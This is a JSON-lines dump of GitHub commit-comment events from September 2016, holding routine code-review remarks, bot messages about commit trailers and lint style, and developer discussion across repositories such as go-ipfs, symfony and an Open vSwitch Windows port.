{"id":"4521457621","type":"CommitCommentEvent","actor":{"login":"miguelfreitas"},"repo":{"name":"miguelfreitas/twister-html"},"payload":{"comment":{"id":18911332,"position":null,"line":null,"path":null,"commit_id":"36155be0cf0f999e897db1dcab710c2e87e82f80","created_at":"2016-09-06T13:55:43Z","updated_at":"2016-09-06T13:55:43Z","body":"hey, very cool!\r\n\r\nsomeday we may even introduce a feature to recall the urls we shorted by scanning past messages from ourselves. i know there is no such flag for filtering directly in getposts, but hopefully it won't take much time to process a bunch of messages in js. just an idea.\r\n"}},"created_at":"2016-09-06T13:55:43Z"}
{"id":"4521458801","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911335,"position":null,"line":null,"path":null,"commit_id":"15368c7f9d7d2ad7e204a3bdc3660b274a8e4699","created_at":"2016-09-06T13:55:55Z","updated_at":"2016-09-06T13:55:55Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:55:55Z"}
{"id":"4521458880","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911336,"position":null,"line":null,"path":null,"commit_id":"3dc0fb3f9ab44676591daa2f958e8366e8994ed6","created_at":"2016-09-06T13:55:55Z","updated_at":"2016-09-06T13:55:55Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:55:55Z"}
{"id":"4521458873","type":"CommitCommentEvent","actor":{"login":"harrygr"},"repo":{"name":"samarkanddesign/samarkand-web"},"payload":{"comment":{"id":18911337,"position":null,"line":null,"path":null,"commit_id":"415afda468f9a16f11eeba4a16ff539e5f096cb6","created_at":"2016-09-06T13:55:56Z","updated_at":"2016-09-06T13:55:56Z","body":"Close #80 "}},"created_at":"2016-09-06T13:55:56Z"}
{"id":"4521460048","type":"CommitCommentEvent","actor":{"login":"mwalle"},"repo":{"name":"jbaltes/python-ixia"},"payload":{"comment":{"id":18911341,"position":63,"line":63,"path":"examples/ixia-control.py","commit_id":"81ff14bbbaa03f68abbb54c1f1bb5a0ddae3ad3d","created_at":"2016-09-06T13:56:08Z","updated_at":"2016-09-06T13:56:08Z","body":"instead of a comma separated list of commands make it possible to use -c multiple times."}},"created_at":"2016-09-06T13:56:08Z"}
{"id":"4521460180","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18911342,"position":null,"line":null,"path":null,"commit_id":"2988de40d8d8899e2efdcac5f295858c5e9d9906","created_at":"2016-09-06T13:56:10Z","updated_at":"2016-09-06T13:56:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#AECb_NuETQObaJjxDHgi6g"}},"created_at":"2016-09-06T13:56:10Z"}
{"id":"4521461168","type":"CommitCommentEvent","actor":{"login":"koekeishiya"},"repo":{"name":"koekeishiya/kwm"},"payload":{"comment":{"id":18911347,"position":null,"line":null,"path":null,"commit_id":"7ab57595e77c209730a422f33a180706e9b84b2b","created_at":"2016-09-06T13:56:19Z","updated_at":"2016-09-06T13:56:19Z","body":">  I was about to file an issue about SystemUIServer taking up 10GB of memory over time\r\n\r\nHmm, how long of a time are we talking about ? \r\n\r\nI normally go about a week between reboots (and kwm relaunches when it doesnt unexpectedly crash) and have never seen anything close to even 1GB on any of the processes. "}},"created_at":"2016-09-06T13:56:19Z"}
{"id":"4521463589","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":18911354,"position":null,"line":null,"path":null,"commit_id":"d353501a60a32e8611df33c227d3d816fc2d07bf","created_at":"2016-09-06T13:56:41Z","updated_at":"2016-09-06T13:56:41Z","body":"mantaaab bung Eddie, sekarang dah okkeeeh ..."}},"created_at":"2016-09-06T13:56:41Z"}
{"id":"4521463717","type":"CommitCommentEvent","actor":{"login":"eschultz-magix"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":18911356,"position":null,"line":null,"path":null,"commit_id":"0f6bc0b00a7820ef59bc0320199f4d49b0398b92","created_at":"2016-09-06T13:56:43Z","updated_at":"2016-09-06T13:56:43Z","body":"Just one question and a hint:\r\n\r\nWhy are you using ```isset() || array_key_exists()```? The only difference is that ```isset``` returns false for NULL values which you want to avoid, so ```array_key_exists``` would be enough.\r\n\r\nAnd the hint: You have a typo: ```@expectedExcepionMessage``` (missing \"T\" in \"Exception\")"}},"created_at":"2016-09-06T13:56:43Z"}
{"id":"4521464287","type":"CommitCommentEvent","actor":{"login":"mwalle"},"repo":{"name":"jbaltes/python-ixia"},"payload":{"comment":{"id":18911360,"position":80,"line":80,"path":"examples/ixia-control.py","commit_id":"81ff14bbbaa03f68abbb54c1f1bb5a0ddae3ad3d","created_at":"2016-09-06T13:56:49Z","updated_at":"2016-09-06T13:56:49Z","body":"introduce a list of available commands instead of taking it from the dictionary of an object"}},"created_at":"2016-09-06T13:56:49Z"}
{"id":"4521466346","type":"CommitCommentEvent","actor":{"login":"Lilymeng"},"repo":{"name":"Lilymeng/NEUQOJ"},"payload":{"comment":{"id":18911367,"position":null,"line":null,"path":null,"commit_id":"dfe430b5a9b732b2ed0a90d7974bc36baac2f9ef","created_at":"2016-09-06T13:57:12Z","updated_at":"2016-09-06T13:57:12Z","body":"333"}},"created_at":"2016-09-06T13:57:12Z"}
{"id":"4521471566","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911374,"position":1,"line":529,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"15b46cd889df0d53584803810627f5b0bbc58e16","created_at":"2016-09-06T13:57:58Z","updated_at":"2016-09-06T13:57:58Z","body":"The \"LVM\" in this description and in the above title should be dropped as well ;)"}},"created_at":"2016-09-06T13:57:58Z"}
{"id":"4521472882","type":"CommitCommentEvent","actor":{"login":"reinierl"},"repo":{"name":"thenewmotion/ocpp-charger"},"payload":{"comment":{"id":18911378,"position":5,"line":12,"path":"src/main/scala/com/thenewmotion/chargenetwork/ocpp/charger/JsonCentralSystemClient.scala","commit_id":"ddbabf89d5892144c90594ff1ddf1ce78209273e","created_at":"2016-09-06T13:58:13Z","updated_at":"2016-09-06T13:58:13Z","body":"It would be great if this flag also becomes available on the command line  (see ChargerApp.scala)"}},"created_at":"2016-09-06T13:58:13Z"}
{"id":"4521475397","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18911384,"position":null,"line":null,"path":null,"commit_id":"25de7a1e088bed5d73f9b77694d484e5e968cd89","created_at":"2016-09-06T13:58:36Z","updated_at":"2016-09-06T13:58:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#B-SWQQv_SEONiA8roiPf-w"}},"created_at":"2016-09-06T13:58:36Z"}
{"id":"4521479264","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18911397,"position":null,"line":null,"path":null,"commit_id":"15368c7f9d7d2ad7e204a3bdc3660b274a8e4699","created_at":"2016-09-06T13:59:17Z","updated_at":"2016-09-06T13:59:17Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-06T13:59:17Z"}
{"id":"4521479366","type":"CommitCommentEvent","actor":{"login":"reinierl"},"repo":{"name":"thenewmotion/ocpp-charger"},"payload":{"comment":{"id":18911398,"position":8,"line":30,"path":"src/main/scala/com/thenewmotion/chargenetwork/ocpp/charger/OcppCharger.scala","commit_id":"ddbabf89d5892144c90594ff1ddf1ce78209273e","created_at":"2016-09-06T13:59:18Z","updated_at":"2016-09-06T13:59:18Z","body":"Why the \": Boolean\"?"}},"created_at":"2016-09-06T13:59:18Z"}
{"id":"4521479657","type":"CommitCommentEvent","actor":{"login":"floybix"},"repo":{"name":"htm-community/sanity-nupic"},"payload":{"comment":{"id":18911401,"position":15,"line":38,"path":"README.md","commit_id":"2bc546dc3ce657eaceabebab58d004763c35ae46","created_at":"2016-09-06T13:59:20Z","updated_at":"2016-09-06T13:59:20Z","body":"We should talk about splitting out a `sanity-comportex`."}},"created_at":"2016-09-06T13:59:20Z"}
{"id":"4521479664","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911400,"position":11,"line":62,"path":"datapath-windows/ovsext/Actions.h","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T13:59:20Z","updated_at":"2016-09-06T13:59:20Z","body":"Moved the struct here so it will be visible from Tunnec.c"}},"created_at":"2016-09-06T13:59:20Z"}
{"id":"4521482771","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911407,"position":14,"line":1138,"path":"datapath-windows/ovsext/BufferMgmt.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T13:59:52Z","updated_at":"2016-09-06T13:59:52Z","body":"This is a small fix to avoid using hardcoded offsets"}},"created_at":"2016-09-06T13:59:52Z"}
{"id":"4521486150","type":"CommitCommentEvent","actor":{"login":"ClemensRobbenhaar"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18911418,"position":253,"line":998,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T14:00:27Z","updated_at":"2016-09-06T14:00:27Z","body":"Fixed in commit c83afe4f8a2951b7bd36307f00b5025c946ddfaa"}},"created_at":"2016-09-06T14:00:27Z"}
{"id":"4521486999","type":"CommitCommentEvent","actor":{"login":"virtualize"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18911421,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-06T14:00:35Z","updated_at":"2016-09-06T14:00:35Z","body":"@core23 yes you're right. But not having a stable release for sf3 is kinda forcing everybody to use the dev-master, resulting in unpleasant incidents like this."}},"created_at":"2016-09-06T14:00:35Z"}
{"id":"4521490724","type":"CommitCommentEvent","actor":{"login":"songsongtao"},"repo":{"name":"songsongtao/songsongtao.github.io"},"payload":{"comment":{"id":18911431,"position":null,"line":null,"path":null,"commit_id":"437d315ed548d49ad2f0a1d736dbd9a5287fed72","created_at":"2016-09-06T14:01:12Z","updated_at":"2016-09-06T14:01:12Z","body":"为了搭建博客而建立的仓库"}},"created_at":"2016-09-06T14:01:12Z"}
{"id":"4521491907","type":"CommitCommentEvent","actor":{"login":"gao-yan"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911438,"position":13,"line":126,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"9abcda0bd80f3eb67a2260f14c76a0a0a9cb9587","created_at":"2016-09-06T14:01:23Z","updated_at":"2016-09-06T14:01:23Z","body":"Given https://github.com/SUSE/doc-sleha/commit/11c1ead3062b04ac01f661e217428e7352b532, we need to remove this."}},"created_at":"2016-09-06T14:01:23Z"}
{"id":"4521496095","type":"CommitCommentEvent","actor":{"login":"kylebrandt"},"repo":{"name":"koekeishiya/kwm"},"payload":{"comment":{"id":18911445,"position":null,"line":null,"path":null,"commit_id":"7ab57595e77c209730a422f33a180706e9b84b2b","created_at":"2016-09-06T14:01:58Z","updated_at":"2016-09-06T14:01:58Z","body":"Sorry I didn't check uptime. But I would say a 3-4 weeks probably? Also a\nfair amount of KWM restarts (I share a monitor with a gaming computer,  so\none monitor gets switched over and the windows rearrange, when it comes\nback everything is a bit confused (i.e. the monitor that comes back isn't\nusing the full screen as it's grid) so a do a quick unload && load.\n\nI also don't know that it was kwm for sure, just relaying some information\nin case it is helpful.\n\nThanks again!\nKyle\n\nOn Tue, Sep 6, 2016 at 9:56 AM, Åsmund Vikane <notifications@github.com>\nwrote:\n\n> I was about to file an issue about SystemUIServer taking up 10GB of memory\n> over time\n>\n> Hmm, how long of a time are we talking about ?\n>\n> I normally go about a week between reboots (and kwm relaunches when it\n> doesnt unexpectedly crash) and have never seen anything close to even 1GB\n> on any of the processes.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/koekeishiya/kwm/commit/7ab57595e77c209730a422f33a180706e9b84b2b#commitcomment-18911347>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABnT0Ax__GE_rqLk_uaQolEQxoE1ZWPIks5qnXEEgaJpZM4J12Mb>\n> .\n>\n"}},"created_at":"2016-09-06T14:01:58Z"}
{"id":"4521498124","type":"CommitCommentEvent","actor":{"login":"nicolas-grekas"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":18911450,"position":null,"line":null,"path":null,"commit_id":"0f6bc0b00a7820ef59bc0320199f4d49b0398b92","created_at":"2016-09-06T14:02:17Z","updated_at":"2016-09-06T14:02:17Z","body":"See https://github.com/symfony/symfony/pull/19848\r\nThx for the typo notice!"}},"created_at":"2016-09-06T14:02:17Z"}
{"id":"4521506971","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911475,"position":5,"line":44,"path":"datapath-windows/ovsext/Debug.h","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:03:46Z","updated_at":"2016-09-06T14:03:46Z","body":"Defined the driver component for logging\r\n"}},"created_at":"2016-09-06T14:03:46Z"}
{"id":"4521508713","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911481,"position":4,"line":106,"path":"datapath-windows/ovsext/Driver.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:04:04Z","updated_at":"2016-09-06T14:04:04Z","body":"Log the build time - for debugging"}},"created_at":"2016-09-06T14:04:04Z"}
{"id":"4521509799","type":"CommitCommentEvent","actor":{"login":"vukivan"},"repo":{"name":"zeress/CK2Plus"},"payload":{"comment":{"id":18911485,"position":4,"line":24,"path":"CK2Plus/history/provinces/341 - Trapani.txt","commit_id":"f26bb919dc45e67470f12b5080036d67871532d9","created_at":"2016-09-06T14:04:17Z","updated_at":"2016-09-06T14:04:17Z","body":"yeah, this really was silly :D\r\n\r\nbasically it converted sunni to orthodox because schism happened."}},"created_at":"2016-09-06T14:04:17Z"}
{"id":"4521510716","type":"CommitCommentEvent","actor":{"login":"andreak"},"repo":{"name":"postgrespro/rum"},"payload":{"comment":{"id":18911488,"position":null,"line":null,"path":null,"commit_id":"c380a0d87b814845cdec0c6ea3fa0fd3b3f88c81","created_at":"2016-09-06T14:04:26Z","updated_at":"2016-09-06T14:04:26Z","body":"That was what I was wondering about, if it's theoretically not possible to do ordering with partial match or if it's a limitation of the current implementation that might be fixed later?"}},"created_at":"2016-09-06T14:04:26Z"}
{"id":"4521512089","type":"CommitCommentEvent","actor":{"login":"vukivan"},"repo":{"name":"zeress/CK2Plus"},"payload":{"comment":{"id":18911492,"position":7,"line":26,"path":"CK2Plus/history/provinces/342 - Agrigento.txt","commit_id":"f26bb919dc45e67470f12b5080036d67871532d9","created_at":"2016-09-06T14:04:39Z","updated_at":"2016-09-06T14:04:39Z","body":"remove }"}},"created_at":"2016-09-06T14:04:39Z"}
{"id":"4521513565","type":"CommitCommentEvent","actor":{"login":"vukivan"},"repo":{"name":"zeress/CK2Plus"},"payload":{"comment":{"id":18911499,"position":7,"line":25,"path":"CK2Plus/history/provinces/341 - Trapani.txt","commit_id":"f26bb919dc45e67470f12b5080036d67871532d9","created_at":"2016-09-06T14:04:54Z","updated_at":"2016-09-06T14:04:54Z","body":"remove }"}},"created_at":"2016-09-06T14:04:54Z"}
{"id":"4521515973","type":"CommitCommentEvent","actor":{"login":"vukivan"},"repo":{"name":"zeress/CK2Plus"},"payload":{"comment":{"id":18911506,"position":9,"line":22,"path":"CK2Plus/history/provinces/339 - Messina.txt","commit_id":"f26bb919dc45e67470f12b5080036d67871532d9","created_at":"2016-09-06T14:05:21Z","updated_at":"2016-09-06T14:05:21Z","body":"remove }"}},"created_at":"2016-09-06T14:05:21Z"}
{"id":"4521518477","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911510,"position":7,"line":441,"path":"datapath-windows/ovsext/Gre.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:05:43Z","updated_at":"2016-09-06T14:05:43Z","body":"Implemented decapsulation for GRE, similar to VXLAN."}},"created_at":"2016-09-06T14:05:43Z"}
{"id":"4521525554","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911532,"position":67,"line":168,"path":"datapath-windows/ovsext/Tunnel.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:06:57Z","updated_at":"2016-09-06T14:06:57Z","body":"This is a helper function taken from the WFP samples.\r\nThis can be stripped from unnecessary code."}},"created_at":"2016-09-06T14:06:57Z"}
{"id":"4521525620","type":"CommitCommentEvent","actor":{"login":"TestNemo"},"repo":{"name":"TestNemo/reviewboard"},"payload":{"comment":{"id":18911533,"position":null,"line":null,"path":null,"commit_id":"1ed8266f3f06fb65a03be14afff9a0b1f0e1a146","created_at":"2016-09-06T14:06:57Z","updated_at":"2016-09-06T14:06:57Z","body":"This looks not good!"}},"created_at":"2016-09-06T14:06:57Z"}
{"id":"4521527446","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911538,"position":9,"line":529,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"11c1ead3062b04ac01f661e217428e7352b53250","created_at":"2016-09-06T14:07:17Z","updated_at":"2016-09-06T14:07:17Z","body":"Haha, right! Good catch! Argh, my bad. Corrected."}},"created_at":"2016-09-06T14:07:17Z"}
{"id":"4521528117","type":"CommitCommentEvent","actor":{"login":"TestNemo"},"repo":{"name":"TestNemo/reviewboard"},"payload":{"comment":{"id":18911541,"position":12,"line":27,"path":"contrib/internal/devserver.py","commit_id":"1ed8266f3f06fb65a03be14afff9a0b1f0e1a146","created_at":"2016-09-06T14:07:23Z","updated_at":"2016-09-06T14:07:23Z","body":"Here is not fine."}},"created_at":"2016-09-06T14:07:23Z"}
{"id":"4521530216","type":"CommitCommentEvent","actor":{"login":"TestNemo"},"repo":{"name":"TestNemo/reviewboard"},"payload":{"comment":{"id":18911547,"position":4,"line":3,"path":"contrib/internal/devserver.py","commit_id":"1ed8266f3f06fb65a03be14afff9a0b1f0e1a146","created_at":"2016-09-06T14:07:44Z","updated_at":"2016-09-06T14:07:44Z","body":"Why put it in here?"}},"created_at":"2016-09-06T14:07:44Z"}
{"id":"4521532762","type":"CommitCommentEvent","actor":{"login":"TYRONEMICHAEL"},"repo":{"name":"JustinGuedes/ramda.swift"},"payload":{"comment":{"id":18911552,"position":null,"line":null,"path":null,"commit_id":"a4b0fa56bb23e60aad9e4bab15cd49999a67033e","created_at":"2016-09-06T14:08:11Z","updated_at":"2016-09-06T14:08:11Z","body":"@JustinGuedes Leaving pretty soon. Just wanted to get this implementation in then want to wrap up tests and comments. Let's use Haskell's function signature for return type. I.e `functionName :: arg1Type -> arg2Type -> ... -> argNType`"}},"created_at":"2016-09-06T14:08:11Z"}
{"id":"4521538820","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18911562,"position":1,"line":529,"path":"xml/art_sle_ha_nfs_quick.xml","commit_id":"15b46cd889df0d53584803810627f5b0bbc58e16","created_at":"2016-09-06T14:09:11Z","updated_at":"2016-09-06T14:09:11Z","body":"Ok, removed LVM in title as well as in the description."}},"created_at":"2016-09-06T14:09:11Z"}
{"id":"4521544274","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18911578,"position":null,"line":null,"path":null,"commit_id":"154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d","created_at":"2016-09-06T14:10:10Z","updated_at":"2016-09-06T14:10:10Z","body":"[R/env.R:24:25:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/env.R#L24) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  lapply(x, function(y) { env[[y]] <- val; return()} )\n                        ^\n```\n[R/env.R:24:52:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/env.R#L24) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  lapply(x, function(y) { env[[y]] <- val; return()} )\n                                                   ^\n```\n[R/generate_sysdata.R:29:3:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/generate_sysdata.R#L29) *warning:* **local variable ‘icd9_short_n’ assigned but may not be used**\n```r\n​  icd9_short_n <- icd9_generate_all_n()\n  ^~~~~~~~~~~~\n```\n[R/generate_sysdata.R:30:3:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/generate_sysdata.R#L30) *warning:* **local variable ‘icd9_short_v’ assigned but may not be used**\n```r\n​  icd9_short_v <- icd9_generate_all_v()\n  ^~~~~~~~~~~~\n```\n[R/generate_sysdata.R:31:3:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/generate_sysdata.R#L31) *warning:* **local variable ‘icd9_short_e’ assigned but may not be used**\n```r\n​  icd9_short_e <- icd9_generate_all_e()\n  ^~~~~~~~~~~~\n```\n[R/generate_sysdata.R:62:3:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/generate_sysdata.R#L62) *warning:* **local variable ‘.nc’ assigned but may not be used**\n```r\n​  .nc <- nchar(icd::icd10cm2016[[\"code\"]])\n  ^~~\n```\n[R/ranges.R:280:17:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/ranges.R#L280) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    function(x) { out_env[[x]] <- TRUE; return() })\n                ^\n```\n[R/ranges.R:280:50:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/R/ranges.R#L280) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    function(x) { out_env[[x]] <- TRUE; return() })\n                                                 ^\n```\n[tests/testthat/test-ranges.R:252:23:](https://github.com/jackwasey/icd/blob/154ddf8ab72ca87fdad0fe6d4f9764e25103ae8d/tests/testthat/test-ranges.R#L252) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  expect_equal_no_icd((\"042\" %i9s% \"042\")[1], \"042\")\n                      ^\n```"}},"created_at":"2016-09-06T14:10:10Z"}
{"id":"4521545603","type":"CommitCommentEvent","actor":{"login":"RAttab"},"repo":{"name":"tokenrove/extrospect-beam"},"payload":{"comment":{"id":18911582,"position":11,"line":11,"path":"src/beam.h","commit_id":"d6bc829bccd5768e99e58119f424b83559cda240","created_at":"2016-09-06T14:10:24Z","updated_at":"2016-09-06T14:10:24Z","body":"Is there a special semantic meaning for upper-cased names?"}},"created_at":"2016-09-06T14:10:24Z"}
{"id":"4521545732","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911583,"position":1142,"line":1243,"path":"datapath-windows/ovsext/Tunnel.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:10:26Z","updated_at":"2016-09-06T14:10:26Z","body":"This is the callout that handles ingress & egress packet injection.\r\nThe incoming packages that are ESP encrypted are reinjected back into the WFP stak in order to get decrypted by the Windows firewall. The next time the packet is seen here, it will be decrypted and sent to the switch.\r\nThe outgoing packets with ESP encryption are reinjected back into the WFP stack at network layer in order to get decrypted by the WFP firewall."}},"created_at":"2016-09-06T14:10:26Z"}
{"id":"4521549322","type":"CommitCommentEvent","actor":{"login":"alilotfi124"},"repo":{"name":"alilotfi124/GLORY"},"payload":{"comment":{"id":18911594,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-06T14:11:00Z","updated_at":"2016-09-06T14:11:00Z","body":"ds"}},"created_at":"2016-09-06T14:11:00Z"}
{"id":"4521550349","type":"CommitCommentEvent","actor":{"login":"alilotfi124"},"repo":{"name":"alilotfi124/GLORY"},"payload":{"comment":{"id":18911601,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-06T14:11:12Z","updated_at":"2016-09-06T14:11:12Z","body":"fdfd\r\n"}},"created_at":"2016-09-06T14:11:12Z"}
{"id":"4521554728","type":"CommitCommentEvent","actor":{"login":"pboca"},"repo":{"name":"pboca/ovs"},"payload":{"comment":{"id":18911613,"position":1297,"line":1398,"path":"datapath-windows/ovsext/Tunnel.c","commit_id":"513ecd81fa270f109ec7e683331b2ddbeb44ca52","created_at":"2016-09-06T14:11:54Z","updated_at":"2016-09-06T14:11:54Z","body":"Not really needed because Windows doesn't recognises the GRE protocol so the incoming packets will be seen only on the DISCARD layer. But for future use, the same code from DISCARD can be called."}},"created_at":"2016-09-06T14:11:54Z"}
{"id":"4521555562","type":"CommitCommentEvent","actor":{"login":"Lilymeng"},"repo":{"name":"Lilymeng/NEUQOJ"},"payload":{"comment":{"id":18911614,"position":1,"line":1,"path":"README.md","commit_id":"dfe430b5a9b732b2ed0a90d7974bc36baac2f9ef","created_at":"2016-09-06T14:12:03Z","updated_at":"2016-09-06T14:12:03Z","body":"222"}},"created_at":"2016-09-06T14:12:03Z"}
{"id":"4521557428","type":"CommitCommentEvent","actor":{"login":"thrawn1975"},"repo":{"name":"thrawn1975/proba"},"payload":{"comment":{"id":18911617,"position":null,"line":null,"path":null,"commit_id":"847f69ca9e8aff0b9b86c826208e7fd16056b8bc","created_at":"2016-09-06T14:12:25Z","updated_at":"2016-09-06T14:12:25Z","body":"ztjtzjtzjzt"}},"created_at":"2016-09-06T14:12:25Z"}
{"id":"4521561854","type":"CommitCommentEvent","actor":{"login":"dicbrus"},"repo":{"name":"chymz/ng2-select"},"payload":{"comment":{"id":18911623,"position":null,"line":null,"path":null,"commit_id":"e35184a12e91a1f74676c6af0de7f24e470de37d","created_at":"2016-09-06T14:13:08Z","updated_at":"2016-09-06T14:13:08Z","body":"I downloaded package\r\n\r\n`npm install` finished with errors.\r\n`npm start` also finished with errors\r\nwebpack starts and not finished\r\nnpm test fails...\r\n\r\nCan smbd help me, how to build bundles of this package? \r\nGreat Thank you.\r\n\r\n"}},"created_at":"2016-09-06T14:13:08Z"}
{"id":"4521566687","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18911632,"position":38,"line":166,"path":"fcrepo-export/src/main/java/org/fcrepo/exporter/Exporter.java","commit_id":"a59ade888515142d359685280d33f06291b2fdc8","created_at":"2016-09-06T14:13:52Z","updated_at":"2016-09-06T14:13:52Z","body":"PR [here](https://github.com/fcrepo4-exts/fcrepo-java-client/pull/17)."}},"created_at":"2016-09-06T14:13:52Z"}
